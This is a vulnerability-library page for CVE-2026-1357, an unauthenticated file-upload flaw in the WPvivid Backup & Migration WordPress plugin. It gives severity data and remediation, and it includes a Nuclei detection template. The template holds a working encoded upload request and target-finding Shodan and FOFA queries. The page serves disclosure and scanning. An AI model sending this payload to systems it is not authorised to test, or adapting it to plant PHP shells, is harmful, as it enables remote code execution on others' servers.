/Vulnerability Library

WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload

CVE-2026-1357
Verified

Description

WPvivid Backup & Migration plugin for WordPress <= 0.9.123 contains an unauthenticated arbitrary file upload vulnerability caused by improper error handling in RSA decryption and lack of path sanitization, letting unauthenticated attackers upload arbitrary PHP files and achieve remote code execution via wpvivid_action=send_to_site parameter.

Severity

Critical

CVSS Score

9.8

Exploit Probability

10%

Affected Product

wpvivid-backuprestore

Published Date

February 13, 2026

Template Author

omarkurt

CVE-2026-1357.yaml
id: CVE-2026-1357

info:
  name: WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload
  author: omarkurt
  severity: critical
  description: |
    WPvivid Backup & Migration plugin for WordPress <= 0.9.123 contains an unauthenticated arbitrary file upload vulnerability caused by improper error handling in RSA decryption and lack of path sanitization, letting unauthenticated attackers upload arbitrary PHP files and achieve remote code execution via wpvivid_action=send_to_site parameter.
  impact: |
    Unauthenticated attackers can upload arbitrary PHP files and execute remote code, leading to full server compromise.
  remediation: |
    Update to the latest version of WPvivid Backup & Migration plugin.
  reference:
    - https://vulnerabletarget.com/VT-2026-1357
    - https://github.com/LucasM0ntes/POC-CVE-2026-1357
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1357
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1357
    epss-score: 0.10218
    epss-percentile: 0.93241
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: wpvivid
    product: wpvivid-backuprestore
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content/plugins/wpvivid-backuprestore"
  tags: cve,cve2026,wordpress,wp,wp-plugin,wpvivid,file-upload,rce,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        wpvivid_action=send_to_site&wpvivid_content=MDAzQUJDMDAwMDAwMDAwMDAwMDExMDUGpYqxgOo0%2FZM3%2BLE%2B23CYS%2BI8Sbr6wwwU6dJweFxMk%2BOogH3GIpPZZMrm72oUS3vnrlf0AXv1vmGVBIbLo3QcQs%2B4JU7cLQw1kWByCFlYkpHcBuzxjEbVtT8VSdFgb6NLW6cpP4BdWT8bJx%2F%2FAOO09m3EFtf2sOcE%2BJjFJAew%2BELondwDkz3u5mssxGaQrlvWgaIlmPwz3FZx8dWC%2FHy7k4P3S5IJ7JV0tefjHJKCOzjPHngkZENu1uI2LmE6JaeF7XdXJCcmFOrNex4yJgIO0raawogHW457fM4wXKDnrM3bwxeLn5KwvAgadaTj4F9zWHxnjBmpa%2BtIaohISVcA5%2BGv6cAA95rzOoXBGUaI

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"success"'
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/vt-nuclei-test.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2026-1357-nuclei-verification-test"

      - type: status
        status:
          - 200
# digest: 490a00463044022061872b14bc555cfc60780c0efb552b08bd398443e775ff67536c047b171df5b6022060a7f58e8817eebf5b611d737d8962faab5fc7e664f070921185cec9db731666:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-1357
CWE ID:
cwe-434

References

https://vulnerabletarget.com/VT-2026-1357https://github.com/LucasM0ntes/POC-CVE-2026-1357https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37https://nvd.nist.gov/vuln/detail/CVE-2026-1357

Remediation Steps

Update to the latest version of WPvivid Backup & Migration plugin.